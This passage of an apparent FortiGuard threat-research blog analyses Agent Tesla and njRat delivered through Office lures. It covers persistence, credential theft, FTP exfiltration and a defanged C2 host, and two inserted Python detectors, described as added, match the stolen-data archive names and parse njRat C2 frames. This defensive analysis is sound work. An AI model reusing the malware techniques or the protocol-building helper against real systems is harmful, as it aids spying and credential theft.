This variant also copies itself into the %appdata% directory as “NGCwje.exe” for persistence.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{&quot;smartImages&quot;:[],&quot;smartSizes&quot;:[],&quot;lazyEnabled&quot;:true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_2023173397.img.png/1664580245098/fig14.png" alt="Figure 14: The attacker’s server information" class="custom"/> </noscript> <span class="cmp-image--title">Figure 14: The attacker’s server information</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>It then collects identifying information about the victim device, such as the baseboard serial number, processor ID, and MAC address, and computes an MD5 hash over these values to use as a machine fingerprint.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{&quot;smartImages&quot;:[],&quot;smartSizes&quot;:[],&quot;lazyEnabled&quot;:true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_499330881.img.png/1664580269352/fig15.png" alt="Figure 15: Generating an MD5 hash for the victim machine’s information" class="custom"/> </noscript> <span class="cmp-image--title">Figure 15: Generating an MD5 hash for the victim machine’s information</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>Agent Tesla works through a long list of applications to steal login credentials, cookies, mail account details, and VPN data. A partial list is shown in the following figure:</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{&quot;smartImages&quot;:[],&quot;smartSizes&quot;:[],&quot;lazyEnabled&quot;:true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_562142613.img.png/1664580299097/fig16.png" alt="Figure 16: List of targeted browser applications" class="custom"/> </noscript> <span class="cmp-image--title">Figure 16: List of targeted browser applications</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>Once the malware has collected the credentials and other information from the victim’s machine, it uploads the data over FTP to a hard-coded IP address. 
</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image='{"smartImages":[],"smartSizes":[],"lazyEnabled":true}'> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_451865649.img.png/1664580354451/fig17.png" alt="Figure 17: Utilizing the FTP protocol" class="custom"/> </noscript> <span class="cmp-image--title">Figure 17: Utilizing the FTP protocol</span> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--default--3"> <noscript data-cmp-image='{"smartImages":[],"smartSizes":[],"lazyEnabled":true}'> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1477775240.img.png/1664580391252/fig18.png" alt="Figure 18: Traffic capture from the victim's machine" class="custom"/> </noscript> <span class="cmp-image--title">Figure 18: Traffic capture from the victim's machine</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>Depending on the type of data it has collected, it uses one of four prefixes: “CO” for cookie data, “KL” for keyboard logging, “PW” for the victim’s password information, and “SC” for screenshot files. The malware joins the data type, username, device name, and timestamp with underscores to form the filename of the ZIP file that holds the data. 
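That naming convention is something a defender can key on at the FTP server or an FTP-aware proxy. The following Python detector is an added example, not code from the FortiGuard post: it pulls uploads whose filenames follow the type_username_devicename_timestamp.zip pattern out of FTP log lines and summarizes which kinds of data left each host. The log layout and every sample value are constructed, and because the post does not show the timestamp format, everything after the device name is taken as the timestamp.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Data-type prefixes the post lists for Agent Tesla's exfiltration archives.
DATA_TYPES = {
    "CO": "cookies",
    "KL": "keystroke log",
    "PW": "passwords",
    "SC": "screenshot",
}

# type_username_devicename_timestamp.zip
# The post does not show the timestamp layout, so everything after the device
# name is kept as the timestamp (assumption); usernames and device names are
# assumed not to contain underscores.
ARCHIVE_RE = re.compile(
    r"^(?P<kind>CO|KL|PW|SC)_(?P<user>[^_]+)_(?P<host>[^_]+)_(?P<stamp>.+)\.zip$",
    re.IGNORECASE,
)

# Constructed FTP server log layout (hypothetical): "date time client CMD [arg]"
LOG_RE = re.compile(
    r"^(?P<time>\S+ \S+) (?P<client>\S+) (?P<cmd>[A-Z]+)(?: (?P<arg>.*))?$"
)

# Commands that write a file on the server; anything else cannot be an upload.
UPLOAD_COMMANDS = {"STOR", "STOU", "APPE"}


@dataclass(frozen=True)
class ExfilUpload:
    time: str
    client: str
    kind: str
    user: str
    host: str
    stamp: str


def parse_archive_name(name: str) -> Optional[Dict[str, str]]:
    """Return the name's components if it follows the Agent Tesla convention."""
    m = ARCHIVE_RE.match(name.strip())
    if not m:
        return None
    parts = m.groupdict()
    parts["kind"] = parts["kind"].upper()
    return parts


def find_exfil_uploads(lines: List[str]) -> List[ExfilUpload]:
    """Scan FTP log lines and keep uploads whose filename matches the convention."""
    found = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m.group("cmd") not in UPLOAD_COMMANDS:
            continue
        parts = parse_archive_name(m.group("arg") or "")
        if parts is None:
            continue
        found.append(ExfilUpload(m.group("time"), m.group("client"), parts["kind"],
                                 parts["user"], parts["host"], parts["stamp"]))
    return found


def summarize(uploads: List[ExfilUpload]) -> Dict[Tuple[str, str, str], Set[str]]:
    """Group hits by (client IP, username, device) and list which data types left the host."""
    summary: Dict[Tuple[str, str, str], Set[str]] = {}
    for u in uploads:
        summary.setdefault((u.client, u.user, u.host), set()).add(DATA_TYPES[u.kind])
    return summary


# Constructed sample log: one infected host uploading three archives, plus benign traffic.
SAMPLE_LOG = [
    "2022-09-28 10:02:11 10.0.0.23 USER ftpuser",
    "2022-09-28 10:02:11 10.0.0.23 PASS ********",
    "2022-09-28 10:02:12 10.0.0.23 STOR PW_jdoe_DESKTOP-7Q2K1_2022_09_28_10_02_10.zip",
    "2022-09-28 10:02:13 10.0.0.23 STOR CO_jdoe_DESKTOP-7Q2K1_2022_09_28_10_02_11.zip",
    "2022-09-28 10:07:40 10.0.0.23 STOR KL_jdoe_DESKTOP-7Q2K1_2022_09_28_10_07_39.zip",
    "2022-09-28 10:09:02 10.0.0.40 STOR quarterly_report_final.zip",
    "2022-09-28 10:10:15 10.0.0.51 STOR SC_report.zip",
    "2022-09-28 10:11:30 10.0.0.51 RETR SC_jdoe_DESKTOP-7Q2K1_2022_09_28_10_02_12.zip",
]

if __name__ == "__main__":
    for key, kinds in summarize(find_exfil_uploads(SAMPLE_LOG)).items():
        print(f"{key[0]} user={key[1]} host={key[2]} exfiltrated: {sorted(kinds)}")
```

A benign file that happens to start with one of the four prefixes but lacks the three underscore-separated fields (SC_report.zip above) is not matched; the per-host summary is what makes a hit worth escalating.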
The list of ZIP files containing the stolen data is shown below:</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2"> <noscript data-cmp-image='{"smartImages":[],"smartSizes":[],"lazyEnabled":true}'> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_2050038414.img.png/1664580418899/fig19.png" alt="Figure 19: Partial list of the ZIP files on the FTP server" class="custom"/> </noscript> <span class="cmp-image--title">Figure 19: Partial list of the ZIP files on the FTP server</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <h2>Final Stage – Part 2</h2> <p>The second payload is njRat, also known as Bladabindi. It is a .NET Trojan for controlling and spying on a victim’s device. This variant uses obfuscation for its string generation and code flow. 
From an IDA graph overview of the method ko(), you can see that this variant is more complex, but the same functions can still be identified.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--default--3"> <noscript data-cmp-image='{"smartImages":[],"smartSizes":[],"lazyEnabled":true}'> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image.img.png/1664581789420/fig2222222.png" alt="Figure 20: IDA graph overview" class="custom"/> </noscript> <span class="cmp-image--title">Figure 20: IDA graph overview</span> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image='{"smartImages":[],"smartSizes":[],"lazyEnabled":true}'> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_848684502.img.png/1664580463024/fig21.png" alt="Figure 21: The entry point of njRat" class="custom"/> </noscript> <span class="cmp-image--title">Figure 21: The entry point of njRat</span> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image='{"smartImages":[],"smartSizes":[],"lazyEnabled":true}'> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1068208180.img.png/1664580484767/fig22.png" alt="Figure 22: String decoding function" class="custom"/> </noscript> <span class="cmp-image--title">Figure 22: String decoding function</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>First, it creates .lnk and .exe files named “Windows” in the “Startup” and “Templates” folders. This name is meant to trick users and analysts into thinking it is a legitimate Windows file.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image='{"smartImages":[],"smartSizes":[],"lazyEnabled":true}'> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_397870754.img.png/1664580589671/fig23.png" alt="Figure 23: Creating persistence" class="custom"/> </noscript> <span class="cmp-image--title">Figure 23: Creating persistence</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>It then retrieves its command and control server hostname and port number in reverse order.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image='{"smartImages":[],"smartSizes":[],"lazyEnabled":true}'> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1031759635.img.png/1664580604079/fig24.png" alt="Figure 24: Command and control server information" class="custom"/> </noscript> <span class="cmp-image--title">Figure 24: Command and control server information</span> </div> <div 
class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>To make sure this malware runs only once on a given victim, it adds a registry value named “di” with the data “!” under “HKEY_CURRENT_USER”.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image='{"smartImages":[],"smartSizes":[],"lazyEnabled":true}'> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_399066262.img.png/1664580630088/25.png" alt="Figure 25: Adding to the registry in “HKEY_CURRENT_USER”" class="custom"/> </noscript> <span class="cmp-image--title">Figure 25: Adding to the registry in “HKEY_CURRENT_USER”</span> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image='{"smartImages":[],"smartSizes":[],"lazyEnabled":true}'> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_550805023.img.png/1664580692263/26.png" alt="Figure 26: Registry status" class="custom"/> </noscript> <span class="cmp-image--title">Figure 26: Registry status</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>It also creates a mutex with the string “Windows”, sets the environment variable “SEE_MASK_NOZONECHECKS” to 1, and checks whether this mutex had already been created. 
If so, it ends the process.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image='{"smartImages":[],"smartSizes":[],"lazyEnabled":true}'> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1099878936.img.png/1664580728525/27.png" alt="Figure 27: Creating a mutex" class="custom"/> </noscript> <span class="cmp-image--title">Figure 27: Creating a mutex</span> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image='{"smartImages":[],"smartSizes":[],"lazyEnabled":true}'> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_97469768.img.png/1664580746061/28.png" alt="Figure 28: Setting the environment variable" class="custom"/> </noscript> <span class="cmp-image--title">Figure 28: Setting the environment variable</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>After it collects the machine’s information, it base64-encodes it and concatenates the data, as seen in Figure 29. 
It then transfers the data to the server “mobnew6565[.]duckdns[.]org” over hardcoded TCP port 7575.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image='{"smartImages":[],"smartSizes":[],"lazyEnabled":true}'> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1013434654.img.png/1664580804003/29.png" alt="Figure 29: Concatenated data" class="custom"/> </noscript> <span class="cmp-image--title">Figure 29: Concatenated data</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>The following is the C2 traffic from the Windows 10 victim machine. The separator has changed to “|-F-|” and the version is “v4.0”, but the packet format is similar to that of older njRat versions:</p> <p style="margin-left: 40.0px;"><i>&lt;message length&gt;.&lt;command&gt;|-F-|&lt;data&gt;</i></p> </div> <div class="cmp cmp-image aem-GridColumn aem-GridColumn--default--12"> <noscript data-cmp-image='{"smartImages":[],"smartSizes":[],"lazyEnabled":true}'> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1146905551.img.png/1664580815458/30.png" alt="Figure 30: Traffic captured from the victim" class="custom"/> </noscript> <span class="cmp-image--title">Figure 30: Traffic captured from the victim</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>Besides Agent Tesla and njRat, we also found a short script in the updated HTML file “www.webclientservices.co[.]uk/p/1[.]html” that downloads a miner to “C:\ProgramData”. 
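The frame layout described above (a decimal length, a dot, the command, then base64-encoded fields joined by “|-F-|”) can be checked against captured traffic. The following Python stream parser is an added example, not code from the FortiGuard post or from njRat: it splits a reassembled TCP stream into frames, reading the prefix as the byte length of everything after the dot, keeps incomplete trailing bytes for the next segment, and base64-decodes each field. The command names, the field order and all victim values in the sample are constructed assumptions, not taken from the post.

```python
import base64
import binascii
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Field separator used by the v4.0 variant described in the post.
SEPARATOR = b"|-F-|"


@dataclass
class NjRatFrame:
    command: str
    fields: List[bytes]

    def decoded_fields(self) -> List[Optional[bytes]]:
        """Base64-decode each field; None where a field is not valid base64."""
        return [try_b64(f) for f in self.fields]


def try_b64(raw: bytes) -> Optional[bytes]:
    """Strict base64 decode (rejects characters outside the alphabet)."""
    try:
        return base64.b64decode(raw, validate=True)
    except (binascii.Error, ValueError):
        return None


def parse_stream(buf: bytes) -> Tuple[List[NjRatFrame], bytes]:
    """Split a reassembled TCP stream into length.command|-F-|field|-F-|... frames.

    The decimal prefix is read as the byte length of everything after the dot.
    Returns the complete frames plus any trailing bytes that do not yet form a
    whole frame, so the caller can append the next segment and call again.
    """
    frames: List[NjRatFrame] = []
    while buf:
        dot = buf.find(b".")
        if dot <= 0 or not buf[:dot].isdigit():
            break                       # no length prefix (yet), or not this protocol
        length = int(buf[:dot])
        start = dot + 1
        if len(buf) < start + length:
            break                       # frame still arriving
        parts = buf[start:start + length].split(SEPARATOR)
        frames.append(NjRatFrame(parts[0].decode("latin-1"), parts[1:]))
        buf = buf[start + length:]
    return frames, buf


def build_frame(command: str, fields: List[bytes]) -> bytes:
    """Encode a frame in the same layout; used here only to construct test traffic."""
    body = SEPARATOR.join([command.encode("latin-1")] + fields)
    return str(len(body)).encode("ascii") + b"." + body


def looks_like_njrat_v4(buf: bytes) -> bool:
    """True when the stream yields at least one well-formed frame carrying the separator."""
    frames, _ = parse_stream(buf)
    return any(frame.fields for frame in frames)


# Constructed sample traffic. The command names ("ll", "P") and the field order
# are assumptions for the example, not taken from the post; the victim data is fake.
CHECK_IN = build_frame("ll", [
    base64.b64encode(b"DESKTOP-7Q2K1"),   # device name
    base64.b64encode(b"jdoe"),            # user name
    b"v4.0",                              # version string, sent in the clear
])
KEEPALIVE = build_frame("P", [])

if __name__ == "__main__":
    # First TCP segment carries two whole frames and the start of a third.
    frames, pending = parse_stream(CHECK_IN + KEEPALIVE + CHECK_IN[:7])
    for frame in frames:
        print(frame.command, frame.decoded_fields())
    # Second segment completes the third frame.
    frames, pending = parse_stream(pending + CHECK_IN[7:])
    print(len(frames), "more frame(s),", len(pending), "bytes pending")
```

A short field such as a bare user name can also be valid base64 by accident, so the decoded values should be treated as hints for triage rather than proof of the field's meaning.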
This is odd behavior, since the other steps in this attack chain try not to leave any physical trace or file on the victim’s machine. We think this might be a distraction so that victims do not notice that another process is loading njRat.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image='{"smartImages":[],"smartSizes":[],"lazyEnabled":true}'> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_673096018.img.png/1664580845966/31.png" alt="Figure 31: JavaScript that downloads a miner" class="custom"/> </noscript> <span class="cmp-image--title">Figure 31: JavaScript that downloads a miner</span> </div> <div class="cmp cmp-image aem-GridColumn aem-GridColumn--default--12"> <noscript data-cmp-image='{"smartImages":[],"smartSizes":[],"lazyEnabled":true}'> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1044894801.img.png/1664580859586/32.png" alt="Figure 32: Process Explorer view for njRat and miner" class="custom"/> </noscript> <span class="cmp-image--title">Figure 32: Process Explorer view for njRat and miner</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <h2>Conclusion</h2> <p>Agent Tesla and njRat have both been highly active malware families for years. Their functions are mature and easy to use for spying on victims or stealing information. 
As we mentioned previously, the malicious URL keeps updating its embedded JavaScript, which means these phishing emails and lure Office documents remain an efficient way to spread this malware. The VBA macro, PowerShell, and JavaScript code embedded in the website can all be used for fileless attacks and can evade some antivirus detection by obfuscating or encoding strings.</p> <p>Users should always be wary of any Office document or unknown file containing links to external websites.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2"> <noscript data-cmp-image='{"smartImages":[],"smartSizes":[],"lazyEnabled":true}'> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_844001079.img.png/1664581083199/33.png" alt="Figure 33: Attack flow" class="custom"/> </noscript> <span class="cmp-image--title">Figure 33: Attack flow</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <h2>Fortinet Protections</h2> <p>The VBA macro and all related malware are detected and blocked by FortiGuard Antivirus:</p> <p style="margin-left: 40.0px;">VBA/Agent.AIN!tr<br /> MSIL/Agent.CJX!tr.spy<br /> MSIL/Agent.CWR!tr<br /> MSIL/VXS!tr<br /> MSIL/CoinMiner.BMT!tr<br /> PowerShell/Agent.GJ!tr<br /> JS/SnakeKeylogger.A!tr.dldr<br /> PowerShell/Agent.AMM!tr<br /> </p> <p>Both the download URL and the attacker’s host have been rated as "Malicious Websites" by the FortiGuard Web Filtering service.</p> <p>Microsoft Office files can be disarmed by the FortiGuard Content Disarm &amp; Reconstruction (CDR) service.</p> <p>Since the majority of malware is delivered via phishing, organizations should also consider leveraging Fortinet solutions designed to train users to understand 
and detect phishing threats:</p> <p style="margin-left: 40.0px;">Our FREE <a href="https://training.fortinet.com/?utm_source=blog&utm_medium=blog&utm_campaign=nse-institute">NSE training</a>: <a href="https://training.fortinet.com/local/staticpage/view.php?page=nse_1&utm_source=blog&utm_medium=blog&utm_campaign=nse-1">NSE 1 – Information Security Awareness</a> includes a module on internet threats designed to help end users learn how to identify and protect themselves from various types of phishing attacks and can be easily added to internal training programs.</p> <p style="margin-left: 40.0px;">The <a href="https://www.fortinet.com/products/phishing-simulation?utm_source=blog&utm_medium=blog&utm_campaign=phishing-simulation">FortiPhish Phishing Simulation Service</a> uses real-world simulations to help organizations test user awareness and vigilance to phishing threats and to train and reinforce proper practices when users encounter targeted phishing attacks.</p> <h2>IOCs</h2> <h3><span style="font-weight: normal;">SHA256:</span></h3> <h3><i style="font-weight: normal;">Office Document</i></h3> <h3><i style="font-weight: normal;">Script File</i></h3> <h3><i style="font-weight: normal;">Payload</i></h3> <h3><i style="font-weight: normal;">Loader</i></h3> <p><i>Learn more about Fortinet’s <a href="https://www.fortinet.com/fortiguard/labs?utm_source=blog&utm_medium=blog&utm_campaign=fortiguard-labs">FortiGuard Labs</a> threat research and global intelligence organization and Fortinet’s FortiGuard AI-powered Security Services <a href="https://www.fortinet.com/solutions/enterprise-midsize-business/security-as-a-service/fortiguard-subscriptions?utm_source=blog&utm_medium=blog&utm_campaign=fortiguard-subscriptions">portfolio</a>. <a href="https://www.fortinet.com/blog/threat-research?utm_source=blog&utm_medium=blog&utm_campaign=threat-research">Sign up</a> to receive our threat research blogs.</i></p> </div> </div> </div> </div> </div> </body> </html>